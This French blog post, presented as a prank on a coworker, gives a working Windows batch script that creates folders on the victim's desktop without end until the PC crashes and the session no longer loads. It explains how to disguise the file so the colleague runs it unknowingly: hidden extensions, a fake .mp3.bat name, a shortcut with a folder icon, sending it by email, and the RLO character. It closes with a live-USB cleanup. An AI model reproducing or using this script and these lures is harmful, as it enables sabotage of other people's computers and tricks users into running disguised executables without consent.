[Troll] Petite blague à faire pour son collègue de travail

[Troll] Petite blague à faire pour son collègue de travail

Votre collègue qui travaille avec vous toute la journée sur son vieux Windows vous agace un peu? Vous voudriez lui faire comprendre la puissance d’un terminal et / ou de linux? Ou tout simplement le troller ou lui bousiller sa session? Voici une petite idée qui a plutôt bien marché: une sorte de fork bomb de création de dossier! Que signifie ce terme (qui vous est peut être inconnu)? Une fork bomb est un malware qui crée (fork) des processus à la suite, et surtout à l’infinie! Ici nous allons créer tout un tas de dossier jusqu’à ce que l’ordinateur plante!

Première étape: préparer le terrain: Pour préparer votre attaque, il faudrait que vous ayez accès à la machine cible quelques instants. Il suffirait de cocher la case “Masquer les extensions connues” sous windows dans les options de gestion des fichiers / dossiers (option activée par défaut sous tous les windows). Cette étape n’est pas nécessaire mais permet de  mieux camoufler l’attaque.

Un petit script batch: Voila un petit script que j’ai pu coder, attention à ne pas le lancer sur sa machine!!!

@echo off

set getdesk=REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop
FOR /f "delims=(=" %%G IN ('%getdesk% ^|find "_SZ"') DO set desktop=%%G
set desktop1=%desktop:*USERPROFILE%\=%
cd "%userprofile%\%desktop1%"

set compteur = 0
:boucle
md surchauffe%compteur%
set /a compteur = compteur + 1
goto boucle

A mettre dans un fichier texte et à renommer en “nomFichier.bat” ou “nomFichier.cmd” (à tester selon votre version de Windows). Ce qui est important, c’est le .bat ou le .cmd et attention sur votre pc il ne doit pas y avoir l’option “Masquer les extensions connues” cochée, car sinon vous avez un fichier qui se nomme en réalité monFichier.bat.txt… Vous pouvez également vous amuser sous Windows avec le caractère RLO (Right to Left Override), je vous laisser faire quelques recherches pour découvrir la magie de cet OS!

Préparer le lancement du script: Plusieurs solutions s’offrent à vous, à vous de choisir la plus judicieuse ou d’en trouver d’autres. Il y a le mail, vous lui présentez un mini projet ou une nouvelle musique / photo et vous renommez le fichier en music.mp3.bat par exemple. Ou alors vous copiez le fichier dans les documents de la victime, puis vous créez un raccourci sur le bureau. L’icône d’un raccourci peut être modifiée, mettez par exemple l’icône d’un dossier! Si c’est un geek lui aussi nommez le League of Legends, il ne pourra pas s’empêcher de cliquer dessus!!!

Réparation: Maintenant que vous avez bien rigolé, vous vous rendrez compte que son pc a totalement bugué et qu’il y a des milliers de dossiers sur son bureau. Un petit redémarrage et hop…. et ben non la session ne se lance plus, impossible de charger tous ces dossiers!!!! C’est à ce moment là que vous intervenez avec un live usb / cd de votre linux préféré pour booter dessus sur son pc et arriver en console jusqu’à son bureau windows. Il ne vous restera plus qu’à exécuter la commande suivante:

rm -r surchauffe*

Attention, sur mon pc (athlon phenom II x4), pour une minute d’exécution du script, il m’a fallu 40 minutes pour supprimer tous les dossiers!!! Et oui plus le processeur est puissant, plus il crée de dossier donc plus il y en aura à supprimer. En revanche sur un processeur plus lent, il y aura moins de dossiers à supprimer mais la commande rm mettra plus de temps à s’exécuter!

Amusez-vous bien!!

2 Comments on “[Troll] Petite blague à faire pour son collègue de travail

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

*

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.